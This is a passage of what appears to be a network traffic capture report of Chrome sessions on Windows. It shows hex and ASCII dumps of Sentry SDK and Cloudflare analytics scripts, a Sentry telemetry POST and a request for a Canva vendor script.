                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 72 2c 72 29 2c 73 2e 68 61 6e 64 6c 65 72 3d 76 6f 69 64 20 30 2c 64 65 6c 65 74 65 20 69 5b 6e 5d 29 2c 30 3d 3d 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 69 29 2e 6c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 65 2e 5f 5f 73 65 6e 74 72 79 5f 69 6e 73 74 72 75 6d 65 6e 74 61 74 69 6f 6e 5f 68 61 6e 64 6c 65 72 73 5f 5f 29 7d 63 61 74 63 68 28 74 29 7b 7d 72 65 74 75 72 6e 20 74 2e 63 61 6c 6c 28 74 68 69 73 2c 6e 2c 65 2c 72 29 7d 7d 29 29 29 7d 29 29 7d 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 78 68 72 22 3a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 28 22 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 22 69 6e 20 79 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 74 3d 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 2e 70 72 6f 74 6f 74 79 70 65 3b 6b 28 74 2c 22
                                                                                                                                                                                                                                                    Data Ascii: r,r),s.handler=void 0,delete i[n]),0===Object.keys(i).length&&delete e.__sentry_instrumentation_handlers__)}catch(t){}return t.call(this,n,e,r)}})))}))}();break;case"xhr":!function(){if(!("XMLHttpRequest"in y))return;const t=XMLHttpRequest.prototype;k(t,"
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 29 72 65 74 75 72 6e 3b 6b 28 79 2c 22 66 65 74 63 68 22 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 2e 2e 2e 6e 29 7b 63 6f 6e 73 74 20 65 3d 7b 61 72 67 73 3a 6e 2c 66 65 74 63 68 44 61 74 61 3a 7b 6d 65 74 68 6f 64 3a 4a 28 6e 29 2c 75 72 6c 3a 4b 28 6e 29 7d 2c 73 74 61 72 74 54 69 6d 65 73 74 61 6d 70 3a 44 61 74 65 2e 6e 6f 77 28 29 7d 3b 72 65 74 75 72 6e 20 57 28 22 66 65 74 63 68 22 2c 7b 2e 2e 2e 65 7d 29 2c 74 2e 61 70 70 6c 79 28 79 2c 6e 29 2e 74 68 65 6e 28 28 74 3d 3e 28 57 28 22 66 65 74 63 68 22 2c 7b 2e 2e 2e 65 2c 65 6e 64 54 69 6d 65 73 74 61 6d 70 3a 44 61 74 65 2e 6e 6f 77 28 29 2c 72 65 73 70 6f 6e 73 65 3a 74 7d 29 2c 74 29 29 2c 28 74 3d 3e 7b 74 68 72 6f 77 20 57 28 22 66 65 74 63 68
                                                                                                                                                                                                                                                    Data Ascii: )return;k(y,"fetch",(function(t){return function(...n){const e={args:n,fetchData:{method:J(n),url:K(n)},startTimestamp:Date.now()};return W("fetch",{...e}),t.apply(y,n).then((t=>(W("fetch",{...e,endTimestamp:Date.now(),response:t}),t)),(t=>{throw W("fetch
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 2e 6d 65 74 68 6f 64 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3a 74 5b 31 5d 26 26 74 5b 31 5d 2e 6d 65 74 68 6f 64 3f 53 74 72 69 6e 67 28 74 5b 31 5d 2e 6d 65 74 68 6f 64 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3a 22 47 45 54 22 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 74 3d 5b 5d 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 5b 30 5d 3f 74 5b 30 5d 3a 22 52 65 71 75 65 73 74 22 69 6e 20 79 26 26 68 28 74 5b 30 5d 2c 52 65 71 75 65 73 74 29 3f 74 5b 30 5d 2e 75 72 6c 3a 53 74 72 69 6e 67 28 74 5b 30 5d 29 7d 6c 65 74 20 47 3b 6c 65 74 20 56 2c 51 3b 66 75 6e 63 74 69 6f 6e 20 59 28 74 2c 6e 3d 21 31 29 7b 72 65 74 75 72 6e 20 65 3d 3e 7b 69 66 28 21 65 7c 7c 51 3d 3d 3d 65 29 72 65 74 75 72 6e 3b 69 66 28 66 75 6e 63
                                                                                                                                                                                                                                                    Data Ascii: .method).toUpperCase():t[1]&&t[1].method?String(t[1].method).toUpperCase():"GET"}function K(t=[]){return"string"==typeof t[0]?t[0]:"Request"in y&&h(t[0],Request)?t[0].url:String(t[0])}let G;let V,Q;function Y(t,n=!1){return e=>{if(!e||Q===e)return;if(func
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 73 2e 76 61 6c 75 65 7c 7c 28 73 2e 76 61 6c 75 65 3d 6e 7c 7c 22 22 29 2c 73 2e 74 79 70 65 7c 7c 28 73 2e 74 79 70 65 3d 65 7c 7c 22 45 72 72 6f 72 22 29 7d 66 75 6e 63 74 69 6f 6e 20 73 74 28 74 2c 6e 29 7b 63 6f 6e 73 74 20 65 3d 65 74 28 74 29 3b 69 66 28 21 65 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 72 3d 65 2e 6d 65 63 68 61 6e 69 73 6d 3b 69 66 28 65 2e 6d 65 63 68 61 6e 69 73 6d 3d 7b 74 79 70 65 3a 22 67 65 6e 65 72 69 63 22 2c 68 61 6e 64 6c 65 64 3a 21 30 2c 2e 2e 2e 72 2c 2e 2e 2e 6e 7d 2c 6e 26 26 22 64 61 74 61 22 69 6e 20 6e 29 7b 63 6f 6e 73 74 20 74 3d 7b 2e 2e 2e 72 26 26 72 2e 64 61 74 61 2c 2e 2e 2e 6e 2e 64 61 74 61 7d 3b 65 2e 6d 65 63 68 61 6e 69 73 6d 2e 64 61 74 61 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 74 29 7b 69 66
                                                                                                                                                                                                                                                    Data Ascii: s.value||(s.value=n||""),s.type||(s.type=e||"Error")}function st(t,n){const e=et(t);if(!e)return;const r=e.mechanism;if(e.mechanism={type:"generic",handled:!0,...r,...n},n&&"data"in n){const t={...r&&r.data,...n.data};e.mechanism.data=t}}function ot(t){if


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    13192.168.2.449755104.16.79.73443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC413OUTGET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.cloudflareinsights.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC373INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:23 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 19948
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                                    ETag: W/"2024.6.1"
                                                                                                                                                                                                                                                    Last-Modified: Thu, 06 Jun 2024 15:52:56 GMT
                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f4a79f61f82c443-EWR
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC996INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 33 34 33 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 32 35 36 3b 2b 2b 6e 29 74 5b 6e 5d 3d 28 6e 2b 32 35 36 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 73 75 62 73 74 72 28 31 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 72 3d 6e 7c 7c 30 2c 69 3d 74 3b 72 65 74 75 72 6e 5b 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b
                                                                                                                                                                                                                                                    Data Ascii: !function(){var e={343:function(e){"use strict";for(var t=[],n=0;n<256;++n)t[n]=(n+256).toString(16).substr(1);e.exports=function(e,n){var r=n||0,i=t;return[i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r+
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 3b 69 66 28 61 5b 36 5d 3d 31 35 26 61 5b 36 5d 7c 36 34 2c 61 5b 38 5d 3d 36 33 26 61 5b 38 5d 7c 31 32 38 2c 74 29 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 31 36 3b 2b 2b 63 29 74 5b 6f 2b 63 5d 3d 61 5b 63 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 69 28 61 29 7d 7d 2c 31 36 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 31 2c 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67
                                                                                                                                                                                                                                                    Data Ascii: ;if(a[6]=15&a[6]|64,a[8]=63&a[8]|128,t)for(var c=0;c<16;++c)t[o+c]=a[c];return t||i(a)}},168:function(e,t,n){"use strict";var r=this&&this.__assign||function(){return r=Object.assign||function(e){for(var t,n=1,r=arguments.length;n<r;n++)for(var i in t=arg
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 72 63 68 50 61 72 61 6d 73 29 7b 76 61 72 20 79 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 67 2e 72 65 70 6c 61 63 65 28 2f 5e 5b 5e 5c 3f 5d 2b 5c 3f 3f 2f 2c 22 22 29 29 2c 68 3d 79 2e 67 65 74 28 22 74 6f 6b 65 6e 22 29 3b 68 26 26 28 70 2e 74 6f 6b 65 6e 3d 68 29 3b 76 61 72 20 54 3d 79 2e 67 65 74 28 22 73 70 61 22 29 3b 70 2e 73 70 61 3d 6e 75 6c 6c 3d 3d 3d 54 7c 7c 22 74 72 75 65 22 3d 3d 3d 54 7d 7d 70 26 26 22 6d 75 6c 74 69 22 21 3d 3d 70 2e 6c 6f 61 64 26 26 28 70 2e 6c 6f 61 64 3d 22 73 69 6e 67 6c 65 22 29 2c 77 69 6e 64 6f 77 2e 5f 5f 63 66 42 65 61 63 6f 6e 3d 70 7d 69 66 28 73 26 26 70 26 26 70 2e 74 6f 6b 65 6e 29 7b 76 61 72 20 77 2c 53 2c 62 3d 21 31 3b 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74
                                                                                                                                                                                                                                                    Data Ascii: rchParams){var y=new URLSearchParams(g.replace(/^[^\?]+\??/,"")),h=y.get("token");h&&(p.token=h);var T=y.get("spa");p.spa=null===T||"true"===T}}p&&"multi"!==p.load&&(p.load="single"),window.__cfBeacon=p}if(s&&p&&p.token){var w,S,b=!1;document.addEventList
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 2e 74 69 6d 69 6e 67 73 56 32 3d 7b 7d 2c 64 2e 76 65 72 73 69 6f 6e 73 2e 74 69 6d 69 6e 67 73 3d 32 2c 64 2e 64 74 3d 6d 5b 30 5d 2e 64 65 6c 69 76 65 72 79 54 79 70 65 2c 64 65 6c 65 74 65 20 64 2e 74 69 6d 69 6e 67 73 2c 74 28 6d 5b 30 5d 2c 64 2e 74 69 6d 69 6e 67 73 56 32 29 29 7d 31 3d 3d 3d 64 2e 76 65 72 73 69 6f 6e 73 2e 74 69 6d 69 6e 67 73 26 26 74 28 63 2c 64 2e 74 69 6d 69 6e 67 73 29 2c 74 28 75 2c 64 2e 6d 65 6d 6f 72 79 29 7d 65 6c 73 65 20 4f 28 64 29 3b 72 65 74 75 72 6e 20 64 2e 66 69 72 73 74 50 61 69 6e 74 3d 6b 28 22 66 69 72 73 74 2d 70 61 69 6e 74 22 29 2c 64 2e 66 69 72 73 74 43 6f 6e 74 65 6e 74 66 75 6c 50 61 69 6e 74 3d 6b 28 22 66 69 72 73 74 2d 63 6f 6e 74 65 6e 74 66 75 6c 2d 70 61 69 6e 74 22 29 2c 70 26 26 28 70 2e 69 63
                                                                                                                                                                                                                                                    Data Ascii: .timingsV2={},d.versions.timings=2,d.dt=m[0].deliveryType,delete d.timings,t(m[0],d.timingsV2))}1===d.versions.timings&&t(c,d.timings),t(u,d.memory)}else O(d);return d.firstPaint=k("first-paint"),d.firstContentfulPaint=k("first-contentful-paint"),p&&(p.ic
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 65 72 65 64 3a 21 30 7d 7d 3b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 52 28 29 3a 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 52 29 7d 29 29 3b 76 61 72 20 41 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4c 26 26 30 3d 3d 3d 76 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 69 64 3d 3d 3d 6c 7d 29 29 2e 6c 65 6e 67 74 68 7d 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 2e 70 75 73 68 28 7b 69 64 3a 6c 2c 75 72 6c 3a 65 2c 74 73 3a 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65
                                                                                                                                                                                                                                                    Data Ascii: ered:!0}};"complete"===window.document.readyState?R():window.addEventListener("load",(function(){window.setTimeout(R)}));var A=function(){return L&&0===v.filter((function(e){return e.id===l})).length},_=function(e){v.push({id:l,url:e,ts:(new Date).getTime
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 72 63 65 4c 6f 61 64 54 69 6d 65 2c 45 2e 6c 63 70 2e 65 72 64 3d 63 2e 65 6c 65 6d 65 6e 74 52 65 6e 64 65 72 44 65 6c 61 79 2c 45 2e 6c 63 70 2e 69 74 3d 6e 75 6c 6c 3d 3d 3d 28 69 3d 63 2e 6c 63 70 52 65 73 6f 75 72 63 65 45 6e 74 72 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 69 6e 69 74 69 61 74 6f 72 54 79 70 65 2c 45 2e 6c 63 70 2e 66 70 3d 6e 75 6c 6c 3d 3d 3d 28 61 3d 6e 75 6c 6c 3d 3d 3d 28 6f 3d 63 2e 6c 63 70 45 6e 74 72 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 65 6c 65 6d 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 66 65 74 63 68 70 72 69 6f 72 69 74 79 22 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 49 4e 50 22
                                                                                                                                                                                                                                                    Data Ascii: rceLoadTime,E.lcp.erd=c.elementRenderDelay,E.lcp.it=null===(i=c.lcpResourceEntry)||void 0===i?void 0:i.initiatorType,E.lcp.fp=null===(a=null===(o=c.lcpEntry)||void 0===o?void 0:o.element)||void 0===a?void 0:a.getAttribute("fetchpriority"));break;case"INP"
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 64 65 64 42 6f 64 79 53 69 7a 65 26 26 28 72 2e 64 65 63 6f 64 65 64 42 6f 64 79 53 69 7a 65 3d 6e 5b 30 5d 2e 64 65 63 6f 64 65 64 42 6f 64 79 53 69 7a 65 29 2c 65 2e 64 74 3d 6e 5b 30 5d 2e 64 65 6c 69 76 65 72 79 54 79 70 65 29 2c 74 28 72 2c 65 2e 74 69 6d 69 6e 67 73 56 32 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 65 29 7b 76 61 72 20 74 3b 69 66 28 22 66 69 72 73 74 2d 63 6f 6e 74 65 6e 74 66 75 6c 2d 70 61 69 6e 74 22 3d 3d 3d 65 26 26 45 2e 66 63 70 26 26 45 2e 66 63 70 2e 76 61 6c 75 65 29 72 65 74 75 72 6e 20 45 2e 66 63 70 2e 76 61 6c 75 65 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 73 2e 67 65 74 45 6e 74 72 69 65 73 42 79 54 79 70 65 29 7b 76 61 72 20 6e 3d 6e 75 6c 6c 3d 3d 3d 28 74 3d 73 2e 67 65 74 45 6e 74 72 69
                                                                                                                                                                                                                                                    Data Ascii: dedBodySize&&(r.decodedBodySize=n[0].decodedBodySize),e.dt=n[0].deliveryType),t(r,e.timingsV2)}}function k(e){var t;if("first-contentful-paint"===e&&E.fcp&&E.fcp.value)return E.fcp.value;if("function"==typeof s.getEntriesByType){var n=null===(t=s.getEntri
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 76 65 6e 74 54 79 70 65 3d 7b 7d 29 29 5b 72 2e 4c 6f 61 64 3d 31 5d 3d 22 4c 6f 61 64 22 2c 72 5b 72 2e 41 64 64 69 74 69 6f 6e 61 6c 3d 32 5d 3d 22 41 64 64 69 74 69 6f 6e 61 6c 22 2c 72 5b 72 2e 57 65 62 56 69 74 61 6c 73 56 32 3d 33 5d 3d 22 57 65 62 56 69 74 61 6c 73 56 32 22 2c 28 6e 3d 74 2e 46 65 74 63 68 50 72 69 6f 72 69 74 79 7c 7c 28 74 2e 46 65 74 63 68 50 72 69 6f 72 69 74 79 3d 7b 7d 29 29 2e 48 69 67 68 3d 22 68 69 67 68 22 2c 6e 2e 4c 6f 77 3d 22 6c 6f 77 22 2c 6e 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 2c 31 30 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77
                                                                                                                                                                                                                                                    Data Ascii: ventType={}))[r.Load=1]="Load",r[r.Additional=2]="Additional",r[r.WebVitalsV2=3]="WebVitalsV2",(n=t.FetchPriority||(t.FetchPriority={})).High="high",n.Low="low",n.Auto="auto"},104:function(e,t){!function(e){"use strict";var t,n,r,i,o,a=function(){return w
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 30 3f 72 3d 22 70 72 65 72 65 6e 64 65 72 22 3a 64 6f 63 75 6d 65 6e 74 2e 77 61 73 44 69 73 63 61 72 64 65 64 3f 72 3d 22 72 65 73 74 6f 72 65 22 3a 6e 2e 74 79 70 65 26 26 28 72 3d 6e 2e 74 79 70 65 2e 72 65 70 6c 61 63 65 28 2f 5f 2f 67 2c 22 2d 22 29 29 29 2c 7b 6e 61 6d 65 3a 65 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 3d 3d 3d 74 3f 2d 31 3a 74 2c 72 61 74 69 6e 67 3a 22 67 6f 6f 64 22 2c 64 65 6c 74 61 3a 30 2c 65 6e 74 72 69 65 73 3a 5b 5d 2c 69 64 3a 22 76 33 2d 22 2e 63 6f 6e 63 61 74 28 44 61 74 65 2e 6e 6f 77 28 29 2c 22 2d 22 29 2e 63 6f 6e 63 61 74 28 4d 61 74 68 2e 66 6c 6f 6f 72 28 38 39 39 39 39 39 39 39 39 39 39 39 39 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2b 31 65 31 32 29 2c 6e 61 76 69 67 61 74 69 6f 6e 54 79 70 65 3a 72 7d 7d 2c
                                                                                                                                                                                                                                                    Data Ascii: 0?r="prerender":document.wasDiscarded?r="restore":n.type&&(r=n.type.replace(/_/g,"-"))),{name:e,value:void 0===t?-1:t,rating:"good",delta:0,entries:[],id:"v3-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:r}},
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 2c 62 2c 21 30 29 2c 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 72 65 72 65 6e 64 65 72 69 6e 67 63 68 61 6e 67 65 22 2c 62 2c 21 30 29 7d 2c 43 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 3c 30 26 26 28 77 3d 53 28 29 2c 45 28 29 2c 6c 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 3d 53 28 29 2c 45 28 29 7d 29 2c 30 29 7d 29 29 29 2c 7b 67 65 74 20 66 69 72 73 74 48 69 64 64 65 6e 54 69 6d 65 28 29 7b 72 65 74 75 72 6e 20 77 7d 7d 7d 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 64 6f 63 75 6d 65 6e 74 2e 70
                                                                                                                                                                                                                                                    Data Ascii: function(){removeEventListener("visibilitychange",b,!0),removeEventListener("prerenderingchange",b,!0)},C=function(){return w<0&&(w=S(),E(),l((function(){setTimeout((function(){w=S(),E()}),0)}))),{get firstHiddenTime(){return w}}},P=function(e){document.p


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    14192.168.2.44975634.120.195.249443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC740OUTPOST /api/6097940/envelope/?sentry_key=2bfedc9d03674aacac8aa2762f22fefd&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.16.0 HTTP/1.1
                                                                                                                                                                                                                                                    Host: o13855.ingest.sentry.io
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    Content-Length: 465
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC465OUTData Raw: 7b 22 73 65 6e 74 5f 61 74 22 3a 22 32 30 32 34 2d 31 32 2d 31 39 54 32 31 3a 32 37 3a 32 31 2e 34 39 35 5a 22 2c 22 73 64 6b 22 3a 7b 22 6e 61 6d 65 22 3a 22 73 65 6e 74 72 79 2e 6a 61 76 61 73 63 72 69 70 74 2e 62 72 6f 77 73 65 72 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 37 2e 31 36 2e 30 22 7d 7d 0a 7b 22 74 79 70 65 22 3a 22 73 65 73 73 69 6f 6e 22 7d 0a 7b 22 73 69 64 22 3a 22 66 38 65 61 38 35 63 66 39 34 65 34 34 39 34 39 39 65 37 30 30 63 39 66 32 62 33 63 37 30 31 39 22 2c 22 69 6e 69 74 22 3a 74 72 75 65 2c 22 73 74 61 72 74 65 64 22 3a 22 32 30 32 34 2d 31 32 2d 31 39 54 32 31 3a 32 37 3a 32 31 2e 34 39 34 5a 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 31 32 2d 31 39 54 32 31 3a 32 37 3a 32 31 2e 34 39 35 5a 22 2c 22 73 74 61 74
                                                                                                                                                                                                                                                    Data Ascii: {"sent_at":"2024-12-19T21:27:21.495Z","sdk":{"name":"sentry.javascript.browser","version":"7.16.0"}}{"type":"session"}{"sid":"f8ea85cf94e449499e700c9f2b3c7019","init":true,"started":"2024-12-19T21:27:21.494Z","timestamp":"2024-12-19T21:27:21.495Z","stat
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC530INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:24 GMT
                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                    vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                                    access-control-expose-headers: x-sentry-error,x-sentry-rate-limits,retry-after
                                                                                                                                                                                                                                                    cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC12INData Raw: 32 0d 0a 7b 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 2{}0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    15192.168.2.449757104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC622OUTGET /web/76d8b06612b94585.vendor.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
